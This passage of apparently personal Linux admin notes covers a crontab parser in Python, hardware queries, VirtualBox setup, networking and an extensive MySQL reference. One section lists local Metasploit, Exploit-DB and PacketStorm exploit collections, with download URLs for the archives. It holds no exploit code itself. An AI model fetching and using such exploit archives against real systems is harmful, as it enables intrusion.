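            a, b = part.split("-", 1)
            start, end = _value(a, names), _value(b, names)
        else:
            start = _value(part, names)
            end = hi if stepped else start      # Vixie cron reads 'N/step' as N-hi/step
        if not (lo <= start <= end <= hi):
            raise ValueError(f"field {spec!r} is outside {lo}-{hi}")
        values.update(range(start, end + 1, step))
    return values


@dataclass
class Schedule:
    minutes: set
    hours: set
    days: set
    months: set
    weekdays: set
    day_restricted: bool       # day-of-month field was not '*'
    weekday_restricted: bool   # day-of-week field was not '*'
    user: Optional[str]        # only present in /etc/crontab lines
    command: str

    def matches(self, when):
        """True if cron would start this job in the minute containing `when`."""
        wd = (when.weekday() + 1) % 7           # cron: Sunday=0; Python: Monday=0
        day_ok, wd_ok = when.day in self.days, wd in self.weekdays
        if self.day_restricted and self.weekday_restricted:
            day_ok = day_ok or wd_ok            # cron rule: EITHER day field may match
        else:
            day_ok = day_ok and wd_ok
        return (when.minute in self.minutes and when.hour in self.hours
                and when.month in self.months and day_ok)


def parse_schedule(line, system=False):
    """Parse one crontab line. system=True means the /etc/crontab layout, where the
    sixth field is the user name. Returns None for @reboot (no time fields)."""
    line = line.strip()
    if line.startswith("@"):
        key, _, rest = line.partition(" ")
        if key == "@reboot":
            return None
        if key not in SPECIAL:
            raise ValueError(f"unknown special string {key!r}")
        line = SPECIAL[key] + " " + rest
    parts = line.split(None, 6 if system else 5)
    if len(parts) < (7 if system else 6):
        raise ValueError("a crontab line needs five time fields and a command")
    specs = parts[:5]
    sets = [expand_field(s, lo, hi, names) for s, (lo, hi, names) in zip(specs, FIELDS)]
    if 7 in sets[4]:                            # 0 and 7 both mean Sunday
        sets[4].discard(7)
        sets[4].add(0)
    user = parts[5] if system else None
    command = parts[6] if system else parts[5]
    return Schedule(*sets, specs[2] != "*", specs[4] != "*", user, command)


def fires_at(schedule, year, month, day, hour, minute):
    """Convenience wrapper: does the schedule fire at this calendar minute?"""
    return schedule.matches(datetime.datetime(year, month, day, hour, minute))
```

A handy use is auditing an unfamiliar crontab: parse every line, print the user and command alongside the next few minutes at which it fires, and look for jobs that run more often than their owner expects or that belong to an account that should not have one.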
Viewing the cron log (on Debian/Ubuntu cron logs through syslog to /var/log/syslog instead, or use journalctl -u cron):
cat /var/log/cron
tail -f /var/log/cron
grep "my-script.sh" /var/log/cron
sudo systemctl status cron
Ref: https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
---[Installing cpan on Linux Mint]--- (top)
Start with this...
$ sudo apt-get install libpath-tiny-perl
$ sudo cpan -i MIME::Lite
We can run the installation process without entering the CPAN shell, as shown below.
$ sudo cpan -i MIME::Lite
$ sudo cpan -i Spreadsheet::Write
$ sudo cpan -i Nmap::Parser
$ sudo cpan -i DBD::SQLite
Ref. https://www.poftut.com/how-to-install-perl-modules-with-cpan/
---[Get display info]--- (top)
ben@ben-b:~$ inxi -G
Graphics:  Device-1: Intel 2nd Generation Core Processor Family Integrated Graphics driver: i915 v: kernel
           Display: x11 server: X.Org 1.20.5 driver: modesetting unloaded: fbdev,vesa resolution: 1366x768~60Hz
           OpenGL: renderer: Mesa DRI Intel Sandybridge Mobile v: 3.3 Mesa 19.2.8
ben@ben-b:~$ sudo lshw -numeric -C display
  *-display
       description: VGA compatible controller
       product: 2nd Generation Core Processor Family Integrated Graphics Controller [8086:126]
       vendor: Intel Corporation [8086]
       physical id: 2
       bus info: pci@0000:00:02.0
       version: 09
       width: 64 bits
       clock: 33MHz
       capabilities: msi pm vga_controller bus_master cap_list rom
       configuration: driver=i915 latency=0
       resources: irq:33 memory:e1400000-e17fffff memory:d0000000-dfffffff ioport:4000(size=64) memory:c0000-dffff
---[GPU Info]--- (top)
To check which GPU is currently in command (that means which is an active VGA controller) type in
ben@ben-b:~$ lspci -vnnn | perl -lne 'print if /^\d+\:.+(\[\S+\:\S+\])/' | grep VGA
00:02.0 VGA compatible controller [0300]: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0126] (rev 09) (prog-if 00 [VGA controller])

Temperature notes:
Some experts hold the view that GPU temperatures around 90 degrees Celsius are normal, but it is better to keep it under 90 degrees. From 65 to 80 degrees Celsius a CPU temperature is close to critical. During general usage your CPU temperature can be anywhere between 30-65 °C, but with extended gaming and heavy usage it can easily reach 65-90 °C. For most processors the maximum temperature limit is somewhere around 90-95 °C.
Ryzen 7 4800H, 4800U, 4700U: 105°C
Ryzen 7: 105°C
AMD Radeon RX graphics processors: anything under 82°C is considered a safe temperature; the card should run 70-80°C in a well ventilated case.

Tools for reading temperatures and GPU load: radeontool, radeontop, sensors (lm-sensors), hddtemp, psensor.

Example sensors output:
acpitz-acpi-0
Adapter: ACPI interface
temp1:        +55.0°C  (crit = +114.0°C)

iwlwifi_1-virtual-0
Adapter: Virtual device
temp1:        +51.0°C

amdgpu-pci-0300
Adapter: PCI adapter
vddgfx:      725.00 mV
fan1:           0 RPM  (min =    0 RPM, max = 4950 RPM)
edge:         +55.0°C  (crit = +100.0°C, hyst = -273.1°C)
                       (emerg = +105.0°C)
junction:     +56.0°C  (crit = +100.0°C, hyst = -273.1°C)
                       (emerg = +105.0°C)
mem:           +0.0°C  (crit = +105.0°C, hyst = -273.1°C)
                       (emerg = +110.0°C)
power1:       22.00 W  (cap =  40.00 W)
---[Get your Motherboard Model]--- (top)
To find your motherboard model, use dmidecode or inxi command.
ben@ben-b:~$ sudo dmidecode -t baseboard | grep -i 'Product' Product Name: 0NVF5K
ben@ben-b:~$ inxi -M
Machine:   Type: Laptop System: Dell product: Latitude E6520 v: 01 serial:
           Mobo: Dell model: 0NVF5K v: A01 serial: BIOS: Dell v: A21 date: 03/06/2018
Ref. https://www.binarytides.com/linux-get-gpu-information/
---[Exploit Collections]--- (top)
These are where I store my local copies of exploit code.
At this time, each collection is kept separate. I would like to figure out a way to index them all into something like searchsploit.
Metasploit Framework
/opt/metasploit-framework/
client authentication configuration file /home/ben/.msf4/db/pg_hba.conf
database at /home/ben/.msf4/db
/home/ben/.msf4/logs/
Local website https://127.0.0.1:5443/
/opt/metasploit-framework
To update:
Use the apt-get commands as root to update your instance of metasploit as needed.
SearchSploit
/opt/exploitdb/searchsploit
The exploits /opt/exploitdb
The papers /opt/exploitdb-papers
searchsploit -u
PacketStorm
I keep these in ~/Hacking/packetstorm.archives/
Before 2021: wget https://dl.packetstormsecurity.net/0012-exploits/2018-exploits.tgz
As of 05.29.2021 14:14:33: https://packetstormsecurity.com/files/download/160738/2020-exploits.tgz
Use wget to download the tgz file into ~/Hacking/packetstorm.archives/
---[Installing VirtualBox]--- (top)
Start installing...
wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- > oracle_vbox_2016.asc
wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- > oracle_vbox.asc
sudo apt-key add oracle_vbox_2016.asc
sudo apt-key add oracle_vbox.asc
echo "deb [arch=amd64] http://download.virtualbox.org/virtualbox/debian bionic contrib" | sudo tee /etc/apt/sources.list.d/virtualbox.list
sudo apt install linux-headers-$(uname -r) dkms
cd ~/
wget https://download.virtualbox.org/virtualbox/6.1.6/Oracle_VM_VirtualBox_Extension_Pack-6.1.6.vbox-extpack

ben@ben-b:~/Downloads$ sudo apt-get install virtualbox-6.1
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package virtualbox-6.1
E: Couldn't find any package by glob 'virtualbox-6.1'
E: Couldn't find any package by regex 'virtualbox-6.1'

ben@ben-b:~$ sudo apt search virtualbox
p   boinc-virtualbox                 - metapackage for virtualbox-savvy projects
p   boinc-virtualbox:i386            - metapackage for virtualbox-savvy projects
p   unity-scope-virtualbox           - VirtualBox scope for Unity
p   virtualbox                       - x86 virtualization solution - base binaries
p   virtualbox:i386                  - x86 virtualization solution - base binaries
p   virtualbox-dkms                  - x86 virtualization solution - kernel module sources for
p   virtualbox-ext-pack              - extra capabilities for VirtualBox, downloader.
p   virtualbox-guest-additions-iso   - guest additions iso image for VirtualBox
p   virtualbox-guest-dkms            - x86 virtualization solution - guest addition module sour
v   virtualbox-guest-dkms:i386       -
p   virtualbox-guest-dkms-hwe        - x86 virtualization solution - guest addition module sour
v   virtualbox-guest-modules         -
v   virtualbox-guest-modules:i386    -
p   virtualbox-guest-source          - x86 virtualization solution - guest addition module sour
p   virtualbox-guest-source-hwe      - x86 virtualization solution - guest addition module sour
p   virtualbox-guest-utils           - x86 virtualization solution - non-X11 guest utilities
p   virtualbox-guest-utils:i386      - x86 virtualization solution - non-X11 guest utilities
p   virtualbox-guest-utils-hwe       - x86 virtualization solution - non-X11 guest utilities
p   virtualbox-guest-utils-hwe:i386  - x86 virtualization solution - non-X11 guest utilities
p   virtualbox-guest-x11             - x86 virtualization solution - X11 guest utilities
p   virtualbox-guest-x11:i386        - x86 virtualization solution - X11 guest utilities
p   virtualbox-guest-x11-hwe         - x86 virtualization solution - X11 guest utilities
p   virtualbox-guest-x11-hwe:i386    - x86 virtualization solution - X11 guest utilities
v   virtualbox-modules               -
p   virtualbox-qt                    - x86 virtualization solution - Qt based user interface
p   virtualbox-qt:i386               - x86 virtualization solution - Qt based user interface
p   virtualbox-source                - x86 virtualization solution - kernel module source

Note that apt only learns about packages in the newly added Oracle repository after a sudo apt update, which is missing from the command list above; the search output shows only the distribution's own virtualbox packages.
So I am stuck at this point regarding version 6.1 - 5.2.34 is the version in the software manager.
Ref. https://computingforgeeks.com/install-virtualbox-on-kali-linux-linux-mint/
See this ref. for info on installing Kali's OVA appliance into Virtualbox. https://itsfoss.com/install-kali-linux-virtualbox/
MIN HOUR DOM MON DOW CMD

Field  Description   Allowed Value
MIN    Minute field  0 to 59
HOUR   Hour field    0 to 23
DOM    Day of Month  1-31
MON    Month field   1-12
DOW    Day Of Week   0-6
CMD    Command       Any command to be executed.

To edit the jobs: crontab -e
List jobs: crontab -l
Run script at 2:00 AM every day: 0 2 * * * /bin/sh backup.sh
---[Linux Kernels]--- (top)
List all of the Linux kernels installed in /boot (its own partition)
$ aptitude search ~ilinux-image
Then remove a specific version
$ sudo apt-get autoremove linux-image-5.5.0-kali2-amd64
Make sure to keep the 'generic' version. Also keep the current and next oldest as a backup.
https://wiki.debian.org/Aptitude
---[Date Time Code]--- (top)
This is an ANSI code I use for current Date/Time stamps (Geany)
%a %m.%d.%Y %H:%M:%S
---[Geany Editor]--- (top)
The dictionary words that I add as part of spell checking are stored in ~/.config/enchant/en_US.dic
The main config file is ~/.config/geany/geany.conf
Inserting Unicode characters
You can insert Unicode code points by hitting Ctrl-Shift-u, then still holding Ctrl-Shift, type some hex digits representing the code point for the character you want and hit Enter or Return (still holding Ctrl-Shift). If you release Ctrl-Shift before hitting Enter or Return (or any other character), the code insertion is completed, but the typed character is also entered. In the case of Enter/Return, it is a newline, as you might expect.
Geany provides a handy bookmarking feature that lets you mark one or more lines in a document, and return the cursor to them using a key combination.
To place a mark on a line, either left-mouse-click in the left margin of the editor window, or else use Ctrl-m. This will produce a small green plus symbol in the margin. You can have as many marks in a document as you like. Click again (or use Ctrl-m again) to remove the bookmark. To remove all the marks in a given document, use "Remove Markers" in the Document menu.
To navigate down your document, jumping from one mark to the next, use Ctrl-. (control period). To go in the opposite direction on the page, use Ctrl-, (control comma). Using the bookmarking feature together with the commands to switch from one editor tab to another (Ctrl-PgUp/PgDn and Ctrl-Tab) provides a particularly fast way to navigate around multiple files.
There is basic support for column mode editing. To use it, create a rectangular selection by holding down the Control and Shift keys (or Alt and Shift on Windows) while selecting some text. Once a rectangular selection exists you can start editing the text within this selection and the modifications will be done for every line in the selection. It is also possible to create a zero-column selection - this is useful to insert text on multiple lines.
https://www.geany.org/manual/current/index.html
---[mtr]--- (top)
You can force mtr to display numeric IP addresses instead of host names (typically FQDNs – Fully Qualified Domain Names), using the -n flag as shown.
$ sudo mtr google.com
$ sudo mtr -n google.com
$ sudo mtr -b google.com
You can set it into report mode using the -r flag, a useful option for producing statistics concerning network quality. You can use this option together with the -c option to specify the number of pings. Since the statistics are printed to std output, you can redirect them to a file for later analysis.
$ sudo mtr -r -c 5 google.com >mtr-report
The -w flag enables wide report mode for a clearer output.
$ sudo mtr -rw -c 5 google.com >mtr-report
Ref: https://www.tecmint.com/mtr-a-network-diagnostic-tool-for-linux/
---[Burn DVD]--- (top)
Rather than using dd to write to a DVD, use growisofs:
$ growisofs -dvd-compat -Z /dev/dvd=my_test.iso
$ growisofs -dvd-compat -Z /dev/dvd=ubuntu-18.04.4-desktop-amd64.iso
The kernel etc are in /boot
I found this at https://askubuntu.com/questions/2793/how-do-i-remove-old-kernel-versions-to-clean-up-the-boot-menu
dpkg --list | grep linux-image | awk '{ print $2 }' | sort -V | sed -n '/'`uname -r`'/q;p' | xargs sudo apt-get -y purge
---[Set Static IP]--- (top)
Setting a static IP address
$ ifconfig eth0 10.32.10.233 netmask 255.255.255.0
$ route add default gw 10.32.10.1
Also
1. Set your IP address
   ifconfig eth0 192.168.1.5 netmask 255.255.255.0 up
2. Set your default gateway
   route add default gw 192.168.1.1
3. Set your DNS server (yes, 1.1.1.1 is a real DNS resolver, run by Cloudflare)
   echo "nameserver 1.1.1.1" > /etc/resolv.conf
In addition...
Show your IP using ip
ip addr show
Bring an interface up or down using ip
ip link set eth1 up
ip link set eth1 down
Showing your routing using ip
ip route show
sudo ifconfig eth0 192.168.0.1 netmask 255.255.255.0
sudo route add default gw 192.168.0.253 eth0
route -n
---[Setting up Perl and Apache2]--- (top)
For every file in cgi-bin, you need to give the www-data group permissions (www-data is the account Apache runs as on Debian/Ubuntu).
ben@benb:~$ sudo chgrp -R www-data /usr/lib/cgi-bin
ben@benb:~$ sudo chmod -R g+rwx /usr/lib/cgi-bin
Note that g+w lets the web server's own account rewrite the scripts it executes; for CGI, read and execute for the group (g+rx) is sufficient, and write access should stay with the owning account.
# perl -MCPAN -e shell
cpan> install DBI
cpan> install DBD::mysql
List all installed CPAN Perl modules
$ instmodsh
To install a perl module
$ cpan
cpan[1]> install DBD::ODBC
Mpstat is part of the sysstat package in Linux. The mpstat command writes to standard output about activities for each available processor, processor 0 being the first one. If no activity has been selected, then the default report is the CPU utilization report.
The first line is a set of column labels. The second line is the value for each column:
%usr    - % CPU usage at the user level
%nice   - % CPU usage for user processes labeled "nice"
%sys    - % CPU usage at the system (Linux kernel) level
%iowait - % CPU usage idling waiting on a disk read/write
%irq    - % CPU usage handling hardware interrupts
%soft   - % CPU usage handling software interrupts
%steal  - % CPU usage being forced to wait for a hypervisor handling other virtual processors
%guest  - % CPU usage spent running a virtual processor
%idle   - % CPU usage on idle time (no processes, and not waiting on a disk read/write)
mpstat without any option will display Global Average Activities of all CPUs
iostat Command for Average Usage
$ iostat
The system will display average CPU usage since the last boot. It will also display input/output load (disk read/write activity).
sar is a performance monitoring tool for collecting, viewing and recording performance data; it can show what a system is doing at any time. The sar command can generate reports and email them to the system admin. The statistics reported by sar include I/O transfer rates, paging activity, process-related activities, interrupts, network activity, memory and swap space utilization, CPU utilization, kernel activities and TTY statistics, among others. Run sar without any option and check the output. The default output lists statistics for every 10 minutes and a final average.
Vmstat
The vmstat command will display statistics about system processes, memory, swap, I/O, and the CPU performance. The data is collected from the last time the command was run to the present. If the command has never been run, the data will be from the last reboot to the current time.
On multiple CPU systems, vmstat averages the number of CPUs into the output. The vmstat command updates its output like top command.
Checking and repairing ext4 fs.
$ sudo fdisk -l
ben@benb:~$ sudo fdisk -l
Disk /dev/mmcblk0: 119.5 GiB, 128286982144 bytes, 250560512 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xb5f93e02

Device         Boot Start       End   Sectors   Size Id Type
/dev/mmcblk0p1       2048 250560511 250558464 119.5G 83 Linux


Disk /dev/sda: 931.5 GiB, 1000204886016 bytes, 1953525168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disklabel type: dos
Disk identifier: 0x0f64c45e

Device     Boot   Start        End    Sectors   Size Id Type
/dev/sda1  *       2048    1499135    1497088   731M 83 Linux
/dev/sda2       1501182 1953523711 1952022530 930.8G  5 Extended
/dev/sda5       1501184 1953523711 1952022528 930.8G 83 Linux

Partition 2 does not start on physical sector boundary.


Disk /dev/mapper/sda5_crypt: 930.8 GiB, 999433437184 bytes, 1952018432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes


Disk /dev/mapper/mint--vg-root: 929.8 GiB, 998374375424 bytes, 1949949952 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes


Disk /dev/mapper/mint--vg-swap_1: 976 MiB, 1023410176 bytes, 1998848 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
ben@benb:~$
---EOE---

$ sudo badblocks -v /dev/sda5 > badsectors.sda5.txt
The -l option tells the command to add the block numbers listed in the file specified by filename (badsectors.txt) to the list of bad blocks.
$ sudo e2fsck -l badsectors.txt /dev/sda5
$ sudo smartctl -H /dev/sda5
For an overview of disk information, use the -a or --all option to print out all SMART information concerning a disk, and -x or --xall, which displays all SMART and non-SMART information about a disk. To run self-tests, use: smartctl -t
systemctl {start|stop|restart|status} mysqld

/* Login. You will first be prompted for the Linux root password, and then for the mysql root account password */
$ sudo mysql -u root -p
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)
mysql> USE mysql;
Database changed

/* Exit the MySQL interpreter */
mysql> QUIT;

/* Login and provide an SQL script to be run and capture output (from Bash command line) */
$ mysql -u username -p db_name < mysqlscript.txt > output.txt

/* Create a database on the sql server */
mysql> create database [databasename];

/* List all databases on the sql server */
mysql> show databases;

/* Switch to a database */
mysql> use [db name];

/* To see all the tables in the db */
mysql> show tables;

/* To see database's field formats */
mysql> describe [table name];

/* To delete a db */
mysql> drop database [database name];

/* To delete a table */
mysql> drop table [table name];

/* Show all data in a table */
mysql> SELECT * FROM [table name];

/* Returns the columns and column information pertaining to the designated table */
mysql> show columns from [table name];

/* Show certain selected rows with the value "whatever" */
mysql> SELECT * FROM [table name] WHERE [field name] = "whatever";

/* Show unique records */
mysql> SELECT DISTINCT [column name] FROM [table name];

/* Show selected records sorted in ascending (asc) or descending (desc) order */
mysql> SELECT [col1],[col2] FROM [table name] ORDER BY [col2] DESC;

/* Duplicate a table */
CREATE TABLE inventorybackup LIKE inventory;
INSERT INTO inventorybackup SELECT * FROM inventory;

/* Count rows */
mysql> SELECT COUNT(*) FROM [table name];

/* Switch to the mysql db. Create a new user */
mysql> INSERT INTO [table name] (Host,User,Password) VALUES('%','user',PASSWORD('password'));

/* To update info already in a table */
mysql> UPDATE [table name] SET Select_priv = 'Y',Insert_priv = 'Y', Update_priv = 'Y' where [field name] = 'user';

/* Delete a row(s) from a table */
mysql> DELETE from [table name] where [field name] = 'whatever';

/* Delete a column */
mysql> alter table [table name] drop column [column name];

/* Add a new column to db */
mysql> alter table [table name] add column [new column name] varchar (20);

/* Change column name */
mysql> alter table [table name] change [old column name] [new column name] varchar (50);

/* Make a unique column so you get no dupes */
mysql> alter table [table name] add unique ([column name]);

/* Make a column bigger */
mysql> alter table [table name] modify [column name] VARCHAR(3);

/* Load a CSV file into a table */
mysql> LOAD DATA INFILE '/tmp/filename.csv' replace INTO TABLE [table name] FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' (field1,field2,field3);

/* Dump all databases for backup. Backup file is sql commands to recreate all db's (run from the shell, not the mysql prompt) */
$ [mysql dir]/bin/mysqldump -u root -ppassword --opt >/tmp/alldatabases.sql

/* Dump just the inventory database */
$ sudo mysqldump -u root -p --databases inventory >~/bkup/mysql/inventoryDB.sql

/* Dump one database for backup */
$ [mysql dir]/bin/mysqldump -u username -ppassword --databases databasename >/tmp/databasename.sql

/* Change a user password */
SET PASSWORD FOR 'dbadmin'@'localhost' = 'bigshark';
or
ALTER USER dbadmin@localhost IDENTIFIED BY 'littlewhale';

/* Export the entire Inventory table to CSV format */
/* Note that you can export only into the '/var/lib/mysql-files/' directory */
select id, ifnull(ip,'None'),ifnull(mac,'Unknown'),ifnull(name,'Unknown'),
  ifnull(location,'unknown'),ifnull(ports,'unknown'),ifnull(type,'Unknown'),
  ifnull(sn,''),ifnull(os,''),ifnull(firmware,''),ifnull(dante,''),
  ifnull(ssid,''),ifnull(channel,''),ifnull(frequency,''),ifnull(band,''),
  ifnull(channelwidth,''),ifnull(strength,''),ifnull(encryption,''),
  ifnull(notes,''),ifnull(ethernet,'')
from inventory
into outfile '/var/lib/mysql-files/inventory.csv.export.date.time.csv'
fields enclosed by '"' terminated by ';' escaped by '"'
lines terminated by '\r\n';

/* This is an actual production example */
/* ben@benb:~/bkup/mysql$ sudo mysqldump -u root -p --databases inventory > inventoryDB.10.05.2020-13:21:49.sql */

/* Dump a table from a database */
$ [mysql dir]/bin/mysqldump -c -u username -ppassword databasename tablename > /tmp/databasename.tablename.sql

/* Restore database (or database table) from backup */
$ [mysql dir]/bin/mysql -u username -ppassword databasename < /tmp/databasename.sql

/* Copy values from one column into another. */
mysql> update inventory set band=channel;

Create Table Example 1.
CREATE TABLE [table name] (firstname VARCHAR(20), middleinitial VARCHAR(3), lastname VARCHAR(35), suffix VARCHAR(3), officeid VARCHAR(10), userid VARCHAR(15), username VARCHAR(8), email VARCHAR(35), phone VARCHAR(25), groups VARCHAR(15), datestamp DATE, timestamp time, pgpemail VARCHAR(255));

Create Table Example 2.
create table [table name] (personid int(50) not null auto_increment primary key, firstname varchar(35), middlename varchar(50), lastname varchar(50) default 'bato');

References:
http://g2pc1.bu.edu/~qzpeng/manual/MySQL%20Commands.htm
https://www.computerhope.com/unix/mysql.htm
mysql> create database inventory;
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| inventory          |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)
mysql> use inventory;
Database changed
mysql> create table inventory (
    id int not null auto_increment primary key,
    ip varchar(15),
    mac varchar(18),
    name varchar(96),
    location varchar(124),
    type varchar(96),
    sn varchar(124),
    os varchar(124),
    firmware varchar(96),
    ssid varchar(96),
    channel varchar(4),
    frequency varchar(10),
    band varchar(8),
    encryption varchar(24),
    notes varchar(1024)
);
mysql> describe inventory;
+------------+---------------+------+-----+---------+----------------+
| Field      | Type          | Null | Key | Default | Extra          |
+------------+---------------+------+-----+---------+----------------+
| id         | int(11)       | NO   | PRI | NULL    | auto_increment |
| ip         | varchar(15)   | YES  |     | NULL    |                |
| mac        | varchar(18)   | YES  |     | NULL    |                |
| name       | varchar(96)   | YES  |     | NULL    |                |
| location   | varchar(124)  | YES  |     | NULL    |                |
| type       | varchar(96)   | YES  |     | NULL    |                |
| sn         | varchar(124)  | YES  |     | NULL    |                |
| os         | varchar(124)  | YES  |     | NULL    |                |
| firmware   | varchar(96)   | YES  |     | NULL    |                |
| ssid       | varchar(96)   | YES  |     | NULL    |                |
| channel    | varchar(4)    | YES  |     | NULL    |                |
| frequency  | varchar(10)   | YES  |     | NULL    |                |
| band       | varchar(8)    | YES  |     | NULL    |                |
| encryption | varchar(24)   | YES  |     | NULL    |                |
| notes      | varchar(1024) | YES  |     | NULL    |                |
+------------+---------------+------+-----+---------+----------------+
15 rows in set (0.01 sec)

/* Load a CSV file into a table. Save the sheet as csv, remove the title line, and save */
mysql> LOAD DATA LOCAL INFILE '~/CCCC/Tech/database/CCCC.Network.Inventory.csv' replace INTO TABLE inventory FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' (ip, mac, name, location, type, sn, os, firmware, ssid, channel, frequency, band, encryption, notes);

/* If both of the following commands give the same total, there are no duplicate mac addresses in the table. Note that there are duplicate IP addresses in the table, and there should be. */
mysql> select mac from inventory where mac != '';
mysql> select distinct mac from inventory;

mysql> select ip,os from inventory where os like '%win%7%';
+--------------+-----------------------------------------------------+
| ip           | os                                                  |
+--------------+-----------------------------------------------------+
| 10.32.10.4   | Windows Server 2008 R2 Standard 7601 Service Pack 1 |
| 10.32.10.137 | Win 7 Home Premium Service Pack 1                   |
| 10.32.10.170 | Win 7 Pro                                           |
| 10.32.10.175 | Win 7                                               |
| 10.32.10.214 | Win 7 Pro                                           |
| 10.32.10.235 | Win 7 Pro                                           |
+--------------+-----------------------------------------------------+
6 rows in set (0.00 sec)

/* Dump the schema of a database. In the following example you can append ' > filename.sql' (no quotes) to capture the output to a file */
$ sudo mysqldump -d -u root -p inventory
-- MySQL dump 10.13  Distrib 5.7.30, for Linux (x86_64)
--
-- Host: localhost    Database: inventory
-- ------------------------------------------------------
-- Server version	5.7.30-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `inventory`
--

DROP TABLE IF EXISTS `inventory`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `inventory` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(15) DEFAULT NULL,
  `mac` varchar(18) DEFAULT NULL,
  `name` varchar(96) DEFAULT NULL,
  `location` varchar(124) DEFAULT NULL,
  `type` varchar(96) DEFAULT NULL,
  `sn` varchar(124) DEFAULT NULL,
  `os` varchar(124) DEFAULT NULL,
  `firmware` varchar(96) DEFAULT NULL,
  `ssid` varchar(96) DEFAULT NULL,
  `channel` varchar(4) DEFAULT NULL,
  `frequency` varchar(10) DEFAULT NULL,
  `band` varchar(8) DEFAULT NULL,
  `encryption` varchar(24) DEFAULT NULL,
  `notes` varchar(1024) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=270 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-05-13 13:28:10

/* Ref for backup and restores: https://linuxize.com/post/how-to-back-up-and-restore-mysql-databases-with-mysqldump/ */

/* Backup a database */
$ sudo mysqldump -u root -p inventory > mysql-inventory-$(date +%F)-backup.sql

/* Restore a database */
$ mysql inventory < mysql-inventory-backup.sql

GROUP BY
select mac,count(*) as Total from inventory group by mac order by Total desc;

/* Create a MySQL user account */
mysql> CREATE USER 'parth'@'localhost' IDENTIFIED BY 'MyPassword';

/* List all MySQL user accounts */
mysql> SELECT User,Host FROM mysql.user;
+------------------+-----------+
| User             | Host      |
+------------------+-----------+
| debian-sys-maint | localhost |
| mysql.session    | localhost |
| mysql.sys        | localhost |
| root             | localhost |
+------------------+-----------+
4 rows in set (0.00 sec)

/* Insert new record if a field value does not exist */
INSERT INTO inventory (mac)
  SELECT 'e8:9f:80:43:55:04'
  WHERE NOT EXISTS (Select mac From inventory WHERE mac ='e8:9f:80:43:55:04') LIMIT 1;

/* Delete a MySQL user account */
mysql> drop user parth@localhost;

/* Here is a short list of commonly used permissions:
   ALL - Allow complete access to a specific database. If a database is not specified, then allow complete access to the entirety of MySQL.
   CREATE - Allow a user to create databases and tables.
   DELETE - Allow a user to delete rows from a table.
   DROP - Allow a user to drop databases and tables.
   EXECUTE - Allow a user to execute stored routines.
   GRANT OPTION - Allow a user to grant or remove another user's privileges.
   INSERT - Allow a user to insert rows into a table.
   SELECT - Allow a user to select data from a database.
   SHOW DATABASES - Allow a user to view a list of all databases.
   UPDATE - Allow a user to update rows in a table. */

/* Grant ALL permissions to a user for a database */
mysql> GRANT ALL PRIVILEGES ON inventory.* TO 'username'@'localhost';

/* After changing permissions, save them */
mysql> FLUSH PRIVILEGES;

/* Display permissions for a user */
mysql> show grants for root@localhost;
+---------------------------------------------------------------------+
| Grants for root@localhost                                           |
+---------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION |
| GRANT PROXY ON ''@'' TO 'root'@'localhost' WITH GRANT OPTION        |
+---------------------------------------------------------------------+
2 rows in set (0.00 sec)

